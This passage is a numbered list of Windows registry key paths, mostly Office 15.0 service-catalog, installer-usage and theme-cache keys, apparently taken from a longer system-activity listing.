  989. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Capabilities",
  990. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ConnectMechanism",
  991. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\IsManaged",
  992. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\IsRemovable",
  993. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ServiceOwner",
  994. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\SortOrder",
  995. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\SupportsMultiple",
  996. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\CapabilitiesMetadata",
  997. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Description",
  998. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Name",
  999. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ServiceId",
  1000. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ServiceUrl",
  1001. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata",
  1002. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata\\DefaultFolderRelativePath",
  1003. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata\\KeyTip",
  1004. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata\\Type",
  1005. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails",
  1006. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails\\Url16x16",
  1007. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails\\Url32x32",
  1008. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails\\Url48x48",
  1009. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP",
  1010. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Capabilities",
  1011. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ConnectMechanism",
  1012. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\IsManaged",
  1013. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\IsRemovable",
  1014. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ServiceOwner",
  1015. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\SortOrder",
  1016. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\SupportsMultiple",
  1017. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\CapabilitiesMetadata",
  1018. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Description",
  1019. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Name",
  1020. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ServiceId",
  1021. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ServiceUrl",
  1022. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Metadata",
  1023. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Metadata\\KeyTip",
  1024. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Metadata\\Type",
  1025. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails",
  1026. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails\\Url16x16",
  1027. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails\\Url32x32",
  1028. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails\\Url48x48",
  1029. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER",
  1030. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Capabilities",
  1031. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ConnectMechanism",
  1032. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\IsManaged",
  1033. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\IsRemovable",
  1034. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ServiceOwner",
  1035. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\SortOrder",
  1036. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\SupportsMultiple",
  1037. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\CapabilitiesMetadata",
  1038. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Description",
  1039. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Name",
  1040. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ServiceId",
  1041. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ServiceUrl",
  1042. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata",
  1043. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata\\HideIfEmpty",
  1044. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata\\KeyTip",
  1045. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata\\Type",
  1046. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails",
  1047. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails\\Url16x16",
  1048. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails\\Url32x32",
  1049. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails\\Url48x48",
  1050. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE",
  1051. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Capabilities",
  1052. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ConnectMechanism",
  1053. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\IsManaged",
  1054. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\IsRemovable",
  1055. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ServiceOwner",
  1056. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\SortOrder",
  1057. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\SupportsMultiple",
  1058. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\CapabilitiesMetadata",
  1059. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Description",
  1060. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Name",
  1061. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ServiceId",
  1062. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ServiceUrl",
  1063. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata",
  1064. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\DefaultCreateRelativePath",
  1065. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\DefaultFolderRelativePath",
  1066. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\KeyTip",
  1067. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\RegularExpression",
  1068. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\Type",
  1069. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails",
  1070. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails\\Url16x16",
  1071. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails\\Url32x32",
  1072. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails\\Url48x48",
  1073. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT",
  1074. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Capabilities",
  1075. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ConnectMechanism",
  1076. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\IsManaged",
  1077. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\IsRemovable",
  1078. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ServiceOwner",
  1079. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\SortOrder",
  1080. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\SupportsMultiple",
  1081. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Description",
  1082. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Name",
  1083. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ServiceId",
  1084. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ServiceUrl",
  1085. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails",
  1086. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails\\Url16x16",
  1087. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails\\Url32x32",
  1088. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails\\Url48x48",
  1089. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE",
  1090. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Capabilities",
  1091. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ConnectMechanism",
  1092. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\IsManaged",
  1093. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\IsRemovable",
  1094. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ServiceOwner",
  1095. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\SortOrder",
  1096. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\SupportsMultiple",
  1097. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Description",
  1098. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Name",
  1099. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ServiceId",
  1100. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ServiceUrl",
  1101. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails",
  1102. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails\\Url16x16",
  1103. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails\\Url32x32",
  1104. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails\\Url48x48",
  1105. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE",
  1106. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Capabilities",
  1107. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ConnectMechanism",
  1108. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\IsManaged",
  1109. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\IsRemovable",
  1110. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ServiceOwner",
  1111. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\SortOrder",
  1112. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\SupportsMultiple",
  1113. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\CapabilitiesMetadata",
  1114. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Description",
  1115. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Name",
  1116. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ServiceId",
  1117. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ServiceUrl",
  1118. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata",
  1119. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\DefaultCreateRelativePath",
  1120. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\DefaultFolderRelativePath",
  1121. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\KeyTip",
  1122. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\RegularExpression",
  1123. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\Type",
  1124. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails",
  1125. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails\\Url16x16",
  1126. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails\\Url32x32",
  1127. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails\\Url48x48",
  1128. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\Trusted Documents\\LastPurgeTime",
  1129. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005119110000000000000000F01FEC\\Usage\\ProductFiles",
  1130. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\General\\LastAutoSavePurgeTime",
  1131. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery\\122462C\\13EFF63",
  1132. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005109F100A0C00000000000F01FEC\\Usage\\SpellingAndGrammarFiles_3082",
  1133. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005109F100C0400000000000F01FEC\\Usage\\SpellingAndGrammarFiles_1036",
  1134. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005109F10090400000000000F01FEC\\Usage\\SpellingAndGrammarFiles_1033",
  1135. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Licensing\\09D07EFC505F4D9CBFD5ACE3217F6654",
  1136. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03090434",
  1137. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457503",
  1138. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033917",
  1139. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457510",
  1140. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001105",
  1141. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033919",
  1142. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457464",
  1143. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457475",
  1144. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033925",
  1145. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033927",
  1146. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457485",
  1147. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033937",
  1148. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001106",
  1149. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033921",
  1150. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457444",
  1151. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03090430",
  1152. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457515",
  1153. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457496",
  1154. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033929",
  1155. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457491",
  1156. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001103",
